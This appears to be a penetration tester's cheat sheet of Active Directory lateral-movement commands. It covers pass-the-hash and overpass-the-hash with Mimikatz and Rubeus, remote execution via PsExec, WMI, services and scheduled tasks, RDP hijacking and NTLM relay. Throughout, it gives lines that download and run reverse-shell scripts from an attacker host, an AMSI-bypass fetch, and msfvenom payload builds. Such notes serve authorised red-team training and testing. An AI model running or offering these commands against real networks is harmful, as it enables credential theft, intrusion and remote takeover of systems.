Add domain user to localadmin
net localgroup Administrators <DOMAIN>\<USER> /add
Connect to machine with administrator privs
Enter-PSSession -Computername <COMPUTERNAME>
$sess = New-PSSession -Computername <COMPUTERNAME>
Enter-PSSession $sess
PSremoting NTLM authetication (after overpass the hash)
Enter-PSSession -ComputerName <COMPUTERNAME> -Authentication Negotiate
Execute commands on a machine
Invoke-Command -Computername <COMPUTERNAME> -Scriptblock {<COMMAND>}
Invoke-Command -Scriptblock {<COMMAND>} $sess
Invoke-Command -Computername <COMPUTERNAME> -FilePath <PATH>
Invoke-Command -FilePath <PATH> $sess
Execute locally loaded function on a list of remote machines
Invoke-Command -Scriptblock ${function:<function>} -Computername (Get-Content computers.txt)
Invoke-Command -ScriptBlock ${function:Invoke-Mimikatz} -Computername (Get-Content computers.txt)
runas /netonly /user:<DOMAIN>\<USER> cmd.exe
runas /netonly /user:<DOMAIN>\<USER> powershell.exe
Remote port forward socat Windows
socat.exe tcp-listen:<LISTENING PORT>,tcp-connect:<TARGET IP SECOND HOP>:<TARGET PORT>
Then let it listen on our kali machine
so we can connect with our windows tool for example
socat tcp-l:<LISTENING PORT>,fork tcp:<TARGET IP TO SEND IT TO (FIRST HOP)>:<TARGET PORT>
.\psexec_windows.exe -hashes <LM HASH>:<NTLM HASH> <DOMAIN>/<USER>@<COMPUTERNAME>
Required elevated privileges to execute commands
cme smb <COMPUTERNAME> -d <DOMAIN> -u <USER> -H <NTLM HASH> -X <COMMAND>
Invoke-SMBExec -Target <COMPUTERNAME> -Domain <DOMAIN> -Username <USERNAME> -Hash <NTLM HASH> -Command <COMMAND> -Verbose
Seems to only work with password or after a overpass the hash attack with Mimikatz!
.\PsExec64.exe \\<COMPUTERNAME> -accepteula -u <DOMAIN>\<ADMINISTRATOR -p <PASSWORD> cmd.exe
.\PsExec64.exe \\<COMPUTERNAME> -accepteula
Over Pass the hash (OPTH) generate tokens(kerberos) from hashes or keys. Needs elevation (Run as administrator)
OPSEC TIP: Use aes256 keys!
.\Rubeus.exe hash /password:<PASSWORD> /user:<USER> /domain:<DOMAIN>
Mimikatz overpass the hash
Invoke-Mimikatz -Command '"sekurlsa::pth /user:<USER> /domain:<DOMAIN> /aes256:<AES256KEYS> /run:powershell.exe"'
Invoke-Mimikatz -Command '"sekurlsa::pth /user:<USER> /domain:<DOMAIN> /ntlm:<HASH> /run:powershell.exe"'
SafetyKatz.exe "sekurlsa::pth /user:<USER> /domain:<DOMAIN> /aes256:<AES256KEYS> /run:cmd.exe" "exit"
Below doesn't need elevation
Rubeus.exe asktgt /user:<USER> /rc4:<NTLM HASH> /domain /nowrap /ptt
Rubeus.exe asktgt /user:<USER> /aes256:<AES256KEYS> /domain /opsec /nowrap /ptt
Below command needs elevation
Rubeus.exe asktgt /user:<USER> /aes256:<AES256KEYS> /domain /opsec /nowrap /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
Enter-PSSession -ComputerName <NAME>
$sess = New-PSSession <SERVER> -Credential <DOMAIN>\<USER>
Invoke-Command -Scriptblock {hostname; whoami;} -Session $sess
Overpass the hash mimikatz reverse shell
powercat -l -v -p 444 -t 5000
$sess = New-PSSession <SERVER>
#.ps1 is a reverse shell back to the attacker machine, make sure you run it as the user you want
$Contents = 'powershell.exe -c iex ((New-Object Net.WebClient).DownloadString(''http://xx.xx.xx.xx/Invoke-PowerShellTcp.ps1''))'; Out-File -Encoding Ascii -InputObject $Contents -FilePath reverse.bat
Invoke-Mimikatz -Command '"sekurlsa::pth /user:<USER> /domain:<DOMAIN> /ntlm:<HASH> /run:C:\reverse.bat"'
cme smb <COMPUTERLIST> -d <DOMAIN> -u <USER> -H <NTLM HASH>
Find-LocalAdminAccess -Verbose
. ./Find-WMILocalAdminAccess.ps1
Find-WMILocalAdminAccess
. ./Find-PSRemotingLocalAdminAccess.ps1
Find-PSRemotingLocalAdminAccess
C:\Users\Public\Loader.exe -path http://xx.xx.xx.xx/something.exe
Use custom exe Assembyload to run netloader in memory and then load binary
C:\Users\Public\AssemblyLoad.exe http://xx.xx.xx.xx/Loader.exe -path http://xx.xx.xx.xx/something.exe
Lateral Movement Techniques
Save pssession in variable
$sess = New-PSSession -Credential $creds -ComputerName <IP>
Invoke-Commannd -ScriptBlock {<COMMAND>} -Session $sess
Run commands on multiple machines
Invoke-Command –Scriptblock {<COMMAND>} -ComputerName (Get-Content computers.txt)
Invoke-Commannd -Filepath <PATH TO SCRIPT> -Session $sess
Execute script on multiple machines
Invoke-Command –FilePath script.ps1 -ComputerName (Get-Content computers.txt)
Execute locally loaded function on remote machines:
Invoke-Command -ScriptBlock ${function:Get-PassHashes} -ComputerName (Get-Content computers.txt)
Copy item through PSSession
Copy-Item -ToSession $sess -Path <PATH> -Destination <DEST> -verbose
psexec.exe -u <DOMAIN>\<USER> -p <PASSWORD> \\<TARGET> cmd.exe
python psexec.py <DOMAIN>/<USER>:<PASSWORD>@<TARGET>
Smbexec.py can be used to automate the process
sc.exe \\<TARGET> create SERVICE_NAME displayname=NAME binpath="COMMAND" start=demand
sc.exe \\<TARGET> start SERVICE_NAME
sc.exe \\<TARGET> delete SERVICE_NAME
schtasks /create /F /tn <TASKNAME> /tr COMMAND /sc once /st 23:00 /s <TARGET> /U <USER> /P <PASSWORD>
schtasks /run /F /tn <TASKNAME> /s <TARGET> /U <USER> /P <PASSWORD>
schtasks /delete /F /tn <TASKNAME> /s <TARGET>
wmiexec.py <DOMAIN>/<USER>:<PASSWORD>@<TARGET>
Pass the hash rdp xfreerdp
xfreerdp /u:<USER> /d:<DOMAIN> /pth:<NTLM HASH> /v:<TARGET>
Invoke-Mimikatz -Command "sekurlsa::pth /user:<USER> /domain:<DOMAIN> /ntlm<NTLM HASH> /run:'mstsc.exe /restrictedadmin'"
If the admin mode is disabled
Enter-PSSession -Computername <TARGET>
New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DisableRestrictedAdmin" -Value "0" -PropertyType DWORD -Force
query user
sc.exe create rdphijack binpath="cmd.exe /c tscon <ID> /dest:<SESSION NAME>"
net start rdphijack
sc.exe delete rdphijack
Accessing RDP credentials
Complicated have to access ECPPTX again and try it out
SCShell.exe <TARGET> XblAuthManager "C:\windows\system32\cmd.exe /c C:\windows\system32\refsvr32.exe /s /n /u /i://<PAYLOAD WEBSITE>/payload.sct scrobj.ddl" . <USER> <PASSWORD>
SCShell.py
Invoke-Pbing -Target <TARGET> -Domain <DOMAIN> -User <USER> -Password <PASSWORD>
Install Powershel web access on target
Install-WindowsFeature -Name WindowsPowerShellWebAccess
Instal-PswaWebApplication -useTestCertificate
Add-PswaAuthorizationRule -Username <USERNAME> -Computername <COMPUTER> -ConfigurationName <CONFIG NAME>
Crackmapexec list hosts with SMB signed disabled
crackmapexec smb <CIDR> --gen-relay-list <OUTPUT FILE>
Edit Responder config file to disable HTTP server and SMB server
ntlmrelay.py -t <TARGET> -c 'powershell.exe iex (New-Object.Net.Webclient).Downloadstring(\"http://<ATTACKER IP>/Invoke-PowerShellTcp.ps1\")"' -smb2support
responder -I <INTERFACE> -v
# Meterpreter ps1 rev shell
msfvenom -p windows/x64/meterpreter_reverse_https -f psh -o msf.ps1 lhost=<HOST> lport=<PORT> exitfunc=thread
# Meterpreter bind tcp executable
msfvenom -p windows/x64/meterpreter/bind_tcp LHOST=<HOST> LPORT=<PORT> -f exe -o bind_tcp.exe
# Meterpreter reverse tcp executable
Msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<HOST> LPORT=<PORT> -f exe > shell.exe
# Bat file to run reverse powershell
msfvenom -p cmd/windows/reverse_powershell LHOST=<HOST> LPORT=<PORT> > attach.bat
powershell.exe -c "iex (New-Object Net.WebClient).DownloadString('http://<IP>/amsi.txt'); iex (New-Object Net.WebClient).DownloadString('http://<IP>/Invoke-PowerShellTcp2.ps1')"